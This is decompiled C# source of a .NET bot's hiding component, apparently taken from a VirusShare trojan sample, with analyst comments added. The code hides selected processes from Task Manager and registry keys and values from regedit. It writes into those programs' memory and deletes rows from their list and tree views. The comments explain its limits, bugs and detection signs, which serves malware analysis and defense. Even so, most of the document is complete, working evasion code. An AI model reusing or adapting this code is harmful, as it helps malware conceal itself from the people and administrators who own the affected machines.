// Decompiled with JetBrains decompiler
// Type: Hearding_Bot.rootkit
// Assembly: Hearding Bot, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 931E7B23-EA6E-4139-8BD0-1A4E0BF9E258
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Fsysna.dljm-a7abcca3397d1344b43d53c1427609ca1808f1991c5d2b158fd67c1ea3e6f19a.exe
//
// ANALYST NOTES (review annotations only; the decompiled code below is unchanged)
//
// Despite the class name this is NOT a kernel rootkit and does not hook any API.
// It is a user-mode GUI-tampering component of a .NET bot that makes selected
// processes and registry entries disappear from the *display* of two specific
// tools only: Task Manager ("taskmgr") and Registry Editor ("regedit"). It does so by
//   * opening those processes with a broad access mask (0x1F0FFF / 0x1F07FF),
//   * allocating memory inside them (VirtualAllocEx) and writing LVITEM/TVITEM
//     structures there (WriteProcessMemory),
//   * driving their ListView / TreeView / StatusBar controls with window messages
//     (LVM_*, TVM_*, SB_*, WM_COMMAND) to read rows and delete the matching ones,
//   * disabling Task Manager's auto-refresh so the deleted rows do not reappear.
// Defensive caveats grounded in this code:
//   * Nothing is hidden from tasklist.exe, WMI, PowerShell, reg.exe, Process
//     Explorer, Autoruns or any other tool - only the two window titles above are
//     targeted by name, so live-response with other tooling is unaffected.
//   * All pointer math uses (int) casts on IntPtr, i.e. this only works as a 32-bit
//     process talking to 32-bit targets; it is silently broken on x64.
//   * Every worker swallows all exceptions (catch {}) and loops forever, so a
//     missing taskmgr/regedit window just means a busy-polling thread.
// Detection hints grounded in this code: OpenProcess on taskmgr.exe/regedit.exe with
// PROCESS_ALL_ACCESS-style masks from an unsigned .NET binary, VirtualAllocEx +
// WriteProcessMemory into those processes, and a WMI "Win32_Process ... GetOwner"
// query issued for its own PIDs.
//
// NOTE(review): generic type arguments were lost in this extraction - every "List"
// below is really List<T> (e.g. RegistryKeys is used as a list of string[]).

using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Management;
using System.Runtime.InteropServices;
using System.Threading;

namespace Hearding_Bot
{
  internal class rootkit
  {
    // One flag per background worker so Initialize(n) is only run once per feature.
    public static bool Initialized1;
    public static bool Initialized2;
    public static bool Initialized3;
    // Throttle for the forced Task Manager refresh (see _HideProcess), wall-clock based.
    public static DateTime TaskManagerTime = DateTime.Now;
    // Last observed Task Manager row count; a change triggers a rescan.
    public static int TaskManagerCount;
    // Set by HideProcess() to force a rescan even if the row count is unchanged.
    public static bool TaskManagerReload;
    // Registry key paths to hide from regedit's tree, each stored lower-cased and
    // split on '\' (see HideRegistryKey / ExtractRegKey).
    public static List RegistryKeys = new List();

    // Starts the background poller for one feature and marks it initialized.
    //   proc == 1: Task Manager process hiding, every 500 ms
    //   proc == 2: regedit value hiding, 10 ms while regedit is open else 250 ms
    //   proc == 3: regedit key hiding,   10 ms while regedit is open else 250 ms
    // The threads are foreground threads that never exit; any other value of proc
    // is ignored.
    public static void Initialize(int proc)
    {
      switch (proc)
      {
        case 1:
          new Thread((ThreadStart) (() =>
          {
            while (true)
            {
              rootkit._HideProcess();
              Thread.Sleep(500);
            }
          })).Start();
          rootkit.Initialized1 = true;
          break;
        case 2:
          new Thread((ThreadStart) (() =>
          {
            while (true)
              Thread.Sleep(rootkit._HideRegistryValue() ? 10 : 250);
          })).Start();
          rootkit.Initialized2 = true;
          break;
        case 3:
          new Thread((ThreadStart) (() =>
          {
            while (true)
              Thread.Sleep(rootkit._HideRegistryKey() ? 10 : 250);
          })).Start();
          rootkit.Initialized3 = true;
          break;
      }
    }

    // One polling pass against Task Manager: cripple its refresh, then delete the
    // list rows whose columns match a registered Proc (name prefix + owner user).
    // Throws (and swallows) when no "taskmgr" process exists, because [0] is
    // indexed on an empty array.
    // Message / constant decoding: 273 = WM_COMMAND, 4100 = LVM_GETITEMCOUNT,
    // 4104 = LVM_DELETEITEM, showCmd 1/3 = SW_SHOWNORMAL/SW_SHOWMAXIMIZED,
    // EnableMenuItem flag 1 = MF_GRAYED.
    public static void _HideProcess()
    {
      try
      {
        IntPtr mainWindowHandle = Process.GetProcessesByName("taskmgr")[0].MainWindowHandle;
        rootkit.Api.WindowPlacement lpwndpl = new rootkit.Api.WindowPlacement();
        lpwndpl.length = Marshal.SizeOf((object) lpwndpl);
        rootkit.Api.GetWindowPlacement(mainWindowHandle, ref lpwndpl);
        // flag1: window is visible (normal or maximized) -> painting is locked while rows are removed.
        bool flag1 = lpwndpl.showCmd == 1 || lpwndpl.showCmd == 3;
        // Control 1009 inside the first child window - presumably the Processes list view
        // of the XP-era Task Manager; verify against the target build.
        IntPtr dlgItem = rootkit.Api.GetDlgItem(rootkit.Api.FindWindowEx(mainWindowHandle, IntPtr.Zero, (string) null, (string) null), 1009);
        IntPtr menu = rootkit.Api.GetMenu(mainWindowHandle);
        // Menu position 2 / sub-position 1 / item 0: consistent with View -> Update Speed
        // and View -> Refresh Now in classic Task Manager (inferred from usage, not proven here).
        IntPtr subMenu1 = rootkit.Api.GetSubMenu(menu, 2);
        IntPtr subMenu2 = rootkit.Api.GetSubMenu(subMenu1, 1);
        uint menuItemId = rootkit.Api.GetMenuItemID(subMenu1, 0);
        if (subMenu2 != IntPtr.Zero)
        {
          // Select the 4th entry of the sub-menu via WM_COMMAND (stops auto-refresh),
          // then try to remove the sub-menu. Note uFlags = 1 is not MF_BYPOSITION (0x400),
          // so whether RemoveMenu actually succeeds is unclear.
          rootkit.Api.SendMessage(mainWindowHandle, 273U, (IntPtr) (long) rootkit.Api.GetMenuItemID(subMenu2, 3), IntPtr.Zero);
          rootkit.Api.RemoveMenu(subMenu1, (uint) (int) subMenu2, 1U);
        }
        // Gray out the item the bot is about to drive itself (manual refresh).
        rootkit.Api.EnableMenuItem(menu, menuItemId, 1U);
        if (flag1)
          rootkit.Api.LockWindowUpdate(dlgItem);
        // At most once per second, send the refresh command ourselves so the list is
        // current right before rows are deleted.
        if ((DateTime.Now - rootkit.TaskManagerTime).TotalMilliseconds > 1000.0)
        {
          rootkit.Api.SendMessage(mainWindowHandle, 273U, (IntPtr) (long) menuItemId, IntPtr.Zero);
          rootkit.TaskManagerTime = DateTime.Now;
        }
        GC.Collect();
        int num = (int) rootkit.Api.SendMessage(dlgItem, 4100U, IntPtr.Zero, "");
        if (num != rootkit.TaskManagerCount || rootkit.TaskManagerReload)
        {
          rootkit.TaskManagerReload = false;
          rootkit.TaskManagerCount = num;
          for (int index1 = 0; index1 < num; ++index1)
          {
            // Read up to 10 columns of the row; stop early once a column repeats column 0
            // (used as an end-of-columns heuristic).
            string[] strArray = new string[10];
            for (int subitem = 0; subitem < 10; ++subitem)
            {
              strArray[subitem] = rootkit.GetListViewItem(dlgItem, index1, subitem).ToLower();
              if (subitem > 0 && strArray[subitem] == strArray[0])
                break;
            }
            // Proc.List is appended under a lock by Proc's constructor but enumerated here
            // without one; concurrent HideProcess() calls can throw, which catch{} hides.
            foreach (rootkit.Proc proc in rootkit.Proc.List)
            {
              bool flag2 = false;   // some column starts with the process name
              bool flag3 = false;   // some other column equals the owner user name
              for (int index2 = 0; index2 < 10 && strArray[index2] != null && (!flag2 || !flag3); ++index2)
              {
                if (strArray[index2].StartsWith(proc.Name))
                  flag2 = true;
                else if (strArray[index2] == proc.User)
                  flag3 = true;
              }
              if (flag2 && flag3)
              {
                // Delete the row from the control only; index1-- re-examines the row that
                // shifts into this slot. The process itself is untouched.
                rootkit.Api.SendMessage(dlgItem, 4104U, (IntPtr) index1--, IntPtr.Zero);
                --rootkit.TaskManagerCount;
                break;
              }
            }
          }
        }
        if (!flag1)
          return;
        rootkit.Api.LockWindowUpdate(IntPtr.Zero);
      }
      catch
      {
      }
    }

    // One polling pass against regedit's value pane (right-hand list view).
    // Returns true if a "regedit" window was found (caller polls faster), false otherwise.
    // The currently selected key is taken from regedit's status bar text with everything
    // up to the first '\' stripped (presumably the "My Computer" prefix), lower-cased, and
    // compared against RegVal.Key (RegistryKey.Name lower-cased).
    // Constants: dialog item 2 = value list, 3 = status bar (inferred from use),
    // 4100 = LVM_GETITEMCOUNT, 4104 = LVM_DELETEITEM.
    public static bool _HideRegistryValue()
    {
      bool flag = false;
      try
      {
        IntPtr mainWindowHandle = Process.GetProcessesByName("regedit")[0].MainWindowHandle;
        flag = true;
        rootkit.Api.FindWindowEx(mainWindowHandle, IntPtr.Zero, (string) null, (string) null);
        IntPtr dlgItem = rootkit.Api.GetDlgItem(mainWindowHandle, 2);
        string statusBarText = rootkit.GetStatusBarText(rootkit.Api.GetDlgItem(mainWindowHandle, 3), 0);
        string lower = statusBarText.Substring(statusBarText.IndexOf("\\") + 1).ToLower();
        // num1: how many registered values live under the currently displayed key.
        int num1 = 0;
        RegistryKey registryKey = (RegistryKey) null;
        foreach (rootkit.RegVal regVal in rootkit.RegVal.List)
        {
          if (regVal.Key == lower)
          {
            registryKey = regVal.RegKey;
            ++num1;
          }
        }
        if (num1 > 0)
        {
          int num2 = (int) rootkit.Api.SendMessage(dlgItem, 4100U, IntPtr.Zero, IntPtr.Zero);
          // Only rescan when the visible row count differs from the expected
          // (real count + 1, presumably the "(Default)" row, minus the hidden ones).
          if (num2 != registryKey.ValueCount + 1 - num1)
          {
            rootkit.Api.LockWindowUpdate(dlgItem);
            // Row 0 is skipped; each remaining row's name column is compared to the
            // registered value names and deleted from the view on match.
            for (int index = 1; index < num2; ++index)
            {
              foreach (rootkit.RegVal regVal in rootkit.RegVal.List)
              {
                if (regVal.Key == lower && regVal.Value == rootkit.GetListViewItem(dlgItem, index, 0).ToLower())
                  rootkit.Api.SendMessage(dlgItem, 4104U, (IntPtr) index--, IntPtr.Zero);
              }
            }
            rootkit.Api.LockWindowUpdate(IntPtr.Zero);
          }
        }
      }
      catch
      {
      }
      return flag;
    }

    // One polling pass against regedit's key tree (left-hand tree view).
    // Returns true if a "regedit" window was found, false otherwise.
    // Walks the tree starting at the first child of the root item and deletes tree
    // nodes whose path matches an entry in RegistryKeys (see ExtractRegKey).
    // Constants: dialog item 1 = tree view (inferred), 4362 = TVM_GETNEXTITEM with
    // wParam 0 = TVGN_ROOT / 4 = TVGN_CHILD, OpenProcess 2035711 = 0x1F0FFF,
    // VirtualAllocEx 4096 = MEM_COMMIT, 4 = PAGE_READWRITE, VirtualFreeEx 32768 = MEM_RELEASE.
    // NOTE(review): no finally - if ExtractRegKey throws, the local buffer, the remote
    // allocation and the process handle all leak (the exception is swallowed).
    public static bool _HideRegistryKey()
    {
      bool flag = false;
      try
      {
        IntPtr mainWindowHandle = Process.GetProcessesByName("regedit")[0].MainWindowHandle;
        flag = true;
        rootkit.Api.FindWindowEx(mainWindowHandle, IntPtr.Zero, (string) null, (string) null);
        IntPtr dlgItem = rootkit.Api.GetDlgItem(mainWindowHandle, 1);
        int index = rootkit.Api.SendMessage(dlgItem, 4362, 4U, (IntPtr) rootkit.Api.SendMessage(dlgItem, 4362, 0U, IntPtr.Zero));
        IntPtr num1 = Marshal.AllocHGlobal(1024);
        int lpwdProcessID;
        rootkit.Api.GetWindowThreadProcessId(dlgItem, out lpwdProcessID);
        // Cross-process read/write into regedit: one 1 KiB scratch page in the target.
        IntPtr num2 = rootkit.Api.OpenProcess(2035711U, false, lpwdProcessID);
        IntPtr num3 = rootkit.Api.VirtualAllocEx(num2, IntPtr.Zero, 1024U, 4096U, 4U);
        rootkit.ExtractRegKey(num2, dlgItem, index, num1, num3, new List());
        Marshal.FreeHGlobal(num1);
        rootkit.Api.VirtualFreeEx(num2, num3, 0, 32768U);
        rootkit.Api.CloseHandle(num2);
        GC.Collect();
      }
      catch
      {
      }
      return flag;
    }

    // Public entry point: register a process to be hidden from Task Manager's list.
    // Starts the Task Manager poller on first use. Proc's constructor does the
    // registration (including a WMI owner lookup, see GetProcessUser); the local is unused.
    public static void HideProcess(Process process)
    {
      if (!rootkit.Initialized1)
        rootkit.Initialize(1);
      rootkit.Proc proc = new rootkit.Proc(process);
      rootkit.TaskManagerReload = true;
    }

    // Public entry point: register a registry value (by key + value name) to be
    // hidden from regedit's value pane. Starts the value poller on first use.
    public static void HideRegistryValue(RegistryKey key, string value)
    {
      if (!rootkit.Initialized2)
        rootkit.Initialize(2);
      rootkit.RegVal regVal = new rootkit.RegVal(key, value);
    }

    // Public entry point: register a registry key to be hidden from regedit's tree.
    // The key's full name (e.g. hive\sub\key) is lower-cased and split into path
    // components so ExtractRegKey can compare it level by level.
    public static void HideRegistryKey(RegistryKey key)
    {
      if (!rootkit.Initialized3)
        rootkit.Initialize(3);
      rootkit.RegistryKeys.Add(key.Name.ToLower().Split('\\'));
    }

    // Recursive tree walk over regedit's TreeView, executed from outside the process:
    //   hProcess       - regedit handle opened with read/write access
    //   hTreeview      - the tree control
    //   index          - HTREEITEM of the first sibling to visit (0 stops)
    //   lpLocalBuffer  - 1 KiB local scratch buffer
    //   lpRemoteBuffer - 1 KiB buffer inside regedit; a TVITEM is written at its start
    //                    and the item text is returned right after it
    //   stack          - lower-cased path components from the tree root to the parent
    // For each sibling: write a TVITEM (mask 1 = TVIF_TEXT, cchTextMax 255) into
    // regedit, send 4364 = TVM_GETITEMA, read the text back, and compare
    // stack + this node against every RegistryKeys entry. On a match the node is
    // deleted (4353 = TVM_DELETEITEM); otherwise its children are recursed into
    // (4362/4 = TVM_GETNEXTITEM/TVGN_CHILD). 4362/1 = TVGN_NEXT advances siblings.
    // NOTE(review): after TVM_DELETEITEM the loop asks for the *next sibling of the
    // deleted handle*; relying on that is fragile. All pointer math is 32-bit only.
    public static void ExtractRegKey(
      IntPtr hProcess,
      IntPtr hTreeview,
      int index,
      IntPtr lpLocalBuffer,
      IntPtr lpRemoteBuffer,
      List stack)
    {
      for (; index > 0; index = rootkit.Api.SendMessage(hTreeview, 4362, 1U, (IntPtr) index))
      {
        rootkit.Api.WriteProcessMemory(hProcess, lpRemoteBuffer, ref new rootkit.Api.TvItem()
        {
          mask = 1,
          hItem = (IntPtr) index,
          pszText = (IntPtr) ((int) lpRemoteBuffer + Marshal.SizeOf(typeof (rootkit.Api.TvItem))),
          cchTextMax = (int) byte.MaxValue
        }, Marshal.SizeOf(typeof (rootkit.Api.TvItem)), IntPtr.Zero);
        rootkit.Api.SendMessage(hTreeview, 4364, 0U, lpRemoteBuffer);
        rootkit.Api.ReadProcessMemory(hProcess, lpRemoteBuffer, lpLocalBuffer, 1024, IntPtr.Zero);
        string lower = Marshal.PtrToStringAnsi((IntPtr) ((int) lpLocalBuffer + Marshal.SizeOf(typeof (rootkit.Api.TvItem)))).ToLower();
        if (index > 0)
        {
          int index1 = rootkit.Api.SendMessage(hTreeview, 4362, 4U, (IntPtr) index);
          stack.Add(lower);
          // flag1: the path down to this node equals one registered key path exactly.
          bool flag1 = false;
          foreach (string[] registryKey in rootkit.RegistryKeys)
          {
            if (stack.Count == registryKey.Length)
            {
              bool flag2 = true;
              for (int index2 = 0; index2 < stack.Count; ++index2)
              {
                if (stack[index2] != registryKey[index2])
                {
                  flag2 = false;
                  break;
                }
              }
              if (flag2)
              {
                flag1 = true;
                break;
              }
            }
          }
          stack.RemoveAt(stack.Count - 1);
          if (flag1)
            rootkit.Api.SendMessage(hTreeview, 4353, 4U, (IntPtr) index);
          else if (index1 > 0)
          {
            // Recurse into children with a copy of the path so siblings are unaffected.
            stack.Add(lower);
            rootkit.ExtractRegKey(hProcess, hTreeview, index1, lpLocalBuffer, lpRemoteBuffer, new List((IEnumerable) stack.ToArray()));
            stack.RemoveAt(stack.Count - 1);
          }
        }
      }
    }

    // Reads the text of status-bar part `index` from a status bar owned by another
    // process. 1036 = SB_GETTEXTLENGTHW (low word = char count, doubled for UTF-16
    // bytes), 1037 = SB_GETTEXTW into a buffer allocated inside the owner
    // (12288 = MEM_COMMIT|MEM_RESERVE, 4 = PAGE_READWRITE, access 2033663 = 0x1F07FF).
    // The bytes are decoded as little-endian UTF-16 code units.
    // NOTE(review): the remote allocation is never released (no VirtualFreeEx here),
    // so every poll leaks a region inside regedit; the handle is closed.
    public static string GetStatusBarText(IntPtr handle, int index)
    {
      int dwSize = ((int) rootkit.Api.SendMessage(handle, 1036U, (IntPtr) index, IntPtr.Zero) & (int) ushort.MaxValue) * 2;
      uint lpdwProcessId = 0;
      int windowThreadProcessId = (int) rootkit.Api.GetWindowThreadProcessId(handle, out lpdwProcessId);
      IntPtr num1 = rootkit.Api.OpenProcess(2033663U, false, (int) lpdwProcessId);
      IntPtr num2 = rootkit.Api.VirtualAllocEx(num1, IntPtr.Zero, (uint) dwSize, 12288U, 4U);
      int numberOfBytesRead = 0;
      byte[] buffer = new byte[dwSize];
      rootkit.Api.SendMessage(handle, 1037U, (IntPtr) index, num2);
      rootkit.Api.ReadProcessMemory(num1, num2, buffer, dwSize, out numberOfBytesRead);
      string statusBarText = "";
      for (int index1 = 0; index1 < buffer.Length; index1 += 2)
        statusBarText += (string) (object) Convert.ToChar((int) buffer[index1] | (int) buffer[index1 + 1] << 8);
      rootkit.Api.CloseHandle(num1);
      return statusBarText;
    }

    // Reads the text of (item, subitem) from a ListView owned by another process:
    // an LVITEM (mask 1 = LVIF_TEXT, cchTextMax 50) is written into a 1 KiB buffer
    // inside the owner, 4101 = LVM_GETITEMA is sent, and the ANSI text that the
    // control stores right after the struct is read back. All remote resources and
    // the handle are released before returning (unlike GetStatusBarText).
    // NOTE(review): the declared LvItem is shorter than the native LVITEM (no
    // lParam/iIndent fields), so the text area overlaps the tail of the native struct;
    // this evidently worked on the targeted Windows builds but is layout-fragile.
    public static string GetListViewItem(IntPtr hWnd, int index, int subitem)
    {
      rootkit.Api.LvItem buffer = new rootkit.Api.LvItem();
      IntPtr num1 = Marshal.AllocHGlobal(1024);
      uint lpdwProcessId;
      int windowThreadProcessId = (int) rootkit.Api.GetWindowThreadProcessId(hWnd, out lpdwProcessId);
      IntPtr num2 = rootkit.Api.OpenProcess(2035711U, false, (int) lpdwProcessId);
      IntPtr num3 = rootkit.Api.VirtualAllocEx(num2, IntPtr.Zero, 1024U, 4096U, 4U);
      buffer.mask = 1U;
      buffer.iItem = index;
      buffer.iSubItem = subitem;
      buffer.pszText = (IntPtr) ((int) num3 + Marshal.SizeOf(typeof (rootkit.Api.LvItem)));
      buffer.cchTextMax = 50;
      rootkit.Api.WriteProcessMemory(num2, num3, ref buffer, Marshal.SizeOf(typeof (rootkit.Api.LvItem)), 0);
      rootkit.Api.SendMessage(hWnd, 4101U, IntPtr.Zero, num3);
      rootkit.Api.ReadProcessMemory(num2, num3, num1, 1024, 0);
      string stringAnsi = Marshal.PtrToStringAnsi((IntPtr) ((int) num1 + Marshal.SizeOf(typeof (rootkit.Api.LvItem))));
      Marshal.FreeHGlobal(num1);
      rootkit.Api.VirtualFreeEx(num2, num3, 0, 32768U);
      rootkit.Api.CloseHandle(num2);
      return stringAnsi;
    }

    // Resolves the owner user name of a process via WMI (Win32_Process.GetOwner).
    // Returns the user name when GetOwner succeeds (return code 0), "" otherwise.
    // The WQL is built by string concatenation, but the only interpolated value is
    // the integer Process.Id. This WMI query is a usable detection artefact.
    public static string GetProcessUser(Process process)
    {
      foreach (ManagementObject managementObject in new ManagementObjectSearcher("Select * From Win32_Process Where ProcessID = " + (object) process.Id).Get())
      {
        string[] args = new string[1]{ "" };
        if (Convert.ToInt32(managementObject.InvokeMethod("GetOwner", (object[]) args)) == 0)
          return args[0];
      }
      return "";
    }

    // A process to hide: matched in Task Manager by lower-cased process name
    // (column starts-with) plus lower-cased owner user (column equals).
    // Registers itself into the static list under a lock on construction.
    public class Proc
    {
      public static List List = new List();
      public string Name;
      public string User;

      public Proc(Process proc)
      {
        this.Name = proc.ProcessName.ToLower();
        this.User = rootkit.GetProcessUser(proc).ToLower();
        lock (rootkit.Proc.List)
          rootkit.Proc.List.Add(this);
      }
    }

    // A registry value to hide: full key name and value name, both lower-cased,
    // plus the live RegistryKey (used for ValueCount). Self-registers under a lock.
    public class RegVal
    {
      public static List List = new List();
      public RegistryKey RegKey;
      public string Key;
      public string Value;

      public RegVal(RegistryKey key, string value)
      {
        this.RegKey = key;
        this.Key = key.Name.ToLower();
        this.Value = value.ToLower();
        lock (rootkit.RegVal.List)
          rootkit.RegVal.List.Add(this);
      }
    }

    // P/Invoke surface. Note the mix of user32 window/menu/message APIs with the
    // kernel32 cross-process memory primitives (OpenProcess, VirtualAllocEx,
    // Read/WriteProcessMemory) - the combination is the behavioural signature of
    // this component. Several overloads are declared but unused (EnableWindow,
    // ShowWindowAsync, the byte[] WriteProcessMemory, the TvItem SendMessage).
    internal static class Api
    {
      [DllImport("user32.dll", SetLastError = true)]
      public static extern IntPtr FindWindowEx(
        IntPtr hwndParent,
        IntPtr hwndChildAfter,
        string lpszClass,
        string lpszWindow);
      [DllImport("user32.dll")]
      public static extern IntPtr GetDlgItem(IntPtr hDlg, int nIDDlgItem);
      [DllImport("user32.dll")]
      public static extern bool EnableWindow(IntPtr hWnd, bool bEnable);
      [DllImport("user32.dll")]
      public static extern IntPtr GetMenu(IntPtr hWnd);
      [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
      public static extern IntPtr GetSubMenu(IntPtr hMenu, int nPos);
      [DllImport("user32.dll")]
      public static extern uint GetMenuItemID(IntPtr hMenu, int nPos);
      [DllImport("user32.dll")]
      public static extern bool EnableMenuItem(IntPtr hMenu, uint uIDEnableItem, uint uEnable);
      [DllImport("user32.dll")]
      public static extern bool RemoveMenu(IntPtr hMenu, uint uPosition, uint uFlags);
      [DllImport("user32.dll", CharSet = CharSet.Auto)]
      public static extern IntPtr SendMessage(
        IntPtr hWnd,
        uint Msg,
        IntPtr wParam,
        IntPtr lParam);
      [DllImport("user32.dll", CharSet = CharSet.Auto)]
      public static extern IntPtr SendMessage(
        IntPtr hWnd,
        uint Msg,
        IntPtr wParam,
        string lParam);
      [DllImport("user32.dll", CharSet = CharSet.Auto)]
      public static extern IntPtr SendMessage(
        IntPtr hWnd,
        [MarshalAs(UnmanagedType.U4)] int msg,
        IntPtr wParam,
        ref rootkit.Api.TvItem item);
      [DllImport("user32.dll")]
      public static extern int SendMessage(IntPtr hWnd, int Msg, uint wParam, IntPtr lParam);
      [DllImport("user32.dll")]
      public static extern bool LockWindowUpdate(IntPtr hWndLock);
      [DllImport("user32.dll")]
      public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
      [DllImport("user32.dll")]
      [return: MarshalAs(UnmanagedType.Bool)]
      public static extern bool GetWindowPlacement(
        IntPtr hWnd,
        ref rootkit.Api.WindowPlacement lpwndpl);
      [DllImport("kernel32.dll")]
      public static extern IntPtr OpenProcess(
        uint dwDesiredAccess,
        [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle,
        int dwProcessId);
      [DllImport("kernel32.dll")]
      public static extern bool CloseHandle(IntPtr hObject);
      [DllImport("kernel32.dll", SetLastError = true)]
      public static extern IntPtr VirtualAllocEx(
        IntPtr hProcess,
        IntPtr lpAddress,
        uint dwSize,
        uint flAllocationType,
        uint flProtect);
      [DllImport("kernel32.dll", SetLastError = true)]
      public static extern bool VirtualFreeEx(
        IntPtr hProcess,
        IntPtr lpAddress,
        int dwSize,
        uint dwFreeType);
      [DllImport("kernel32.dll")]
      public static extern bool ReadProcessMemory(
        IntPtr hProcess,
        IntPtr baseAddress,
        byte[] buffer,
        int dwSize,
        out int numberOfBytesRead);
      [DllImport("kernel32.dll")]
      public static extern bool ReadProcessMemory(
        IntPtr hProcess,
        IntPtr lpBaseAddress,
        IntPtr lpBuffer,
        int dwSize,
        int lpNumberOfBytesRead);
      [DllImport("kernel32.dll")]
      public static extern bool WriteProcessMemory(
        IntPtr hProcess,
        IntPtr lpBaseAddress,
        ref rootkit.Api.TvItem buffer,
        int dwSize,
        IntPtr lpNumberOfBytesWritten);
      [DllImport("kernel32.dll", SetLastError = true)]
      public static extern bool WriteProcessMemory(
        IntPtr hProcess,
        IntPtr lpBaseAddress,
        byte[] lpBuffer,
        uint nSize,
        out int lpNumberOfBytesWritten);
      [DllImport("kernel32.dll")]
      public static extern bool WriteProcessMemory(
        IntPtr hProcess,
        IntPtr lpBaseAddress,
        ref rootkit.Api.LvItem buffer,
        int dwSize,
        int lpNumberOfBytesWritten);
      [DllImport("kernel32.dll")]
      public static extern bool ReadProcessMemory(
        IntPtr hProcess,
        IntPtr lpBaseAddress,
        IntPtr lpBuffer,
        int dwSize,
        IntPtr lpNumberOfBytesRead);
      [DllImport("user32.dll", SetLastError = true)]
      public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
      [DllImport("user32.dll")]
      public static extern IntPtr GetWindowThreadProcessId(IntPtr hWnd, out int lpwdProcessID);

      // Partial LVITEM (native layout continues with lParam, iIndent, ...).
      public struct LvItem
      {
        public uint mask;
        public int iItem;
        public int iSubItem;
        public uint state;
        public uint stateMask;
        public IntPtr pszText;
        public int cchTextMax;
        public int iImage;
      }

      // TVITEMEX-style layout (includes iIntegral).
      public struct TvItem
      {
        public int mask;
        public IntPtr hItem;
        public int state;
        public int stateMask;
        public IntPtr pszText;
        public int cchTextMax;
        public int iImage;
        public int iSelectedImage;
        public int cChildren;
        public IntPtr lParam;
        public int iIntegral;
      }

      // RECT / POINT / WINDOWPLACEMENT mirrors; only showCmd is read by this class.
      public struct Rect
      {
        private int left;
        private int top;
        private int right;
        private int bottom;
      }

      public struct Point
      {
        private int x;
        private int y;
      }

      public struct WindowPlacement
      {
        public int length;
        public int flags;
        public int showCmd;
        public rootkit.Api.Point ptMinPosition;
        public rootkit.Api.Point ptMaxPosition;
        public rootkit.Api.Rect rcNormalPosition;
      }
    }
  }
}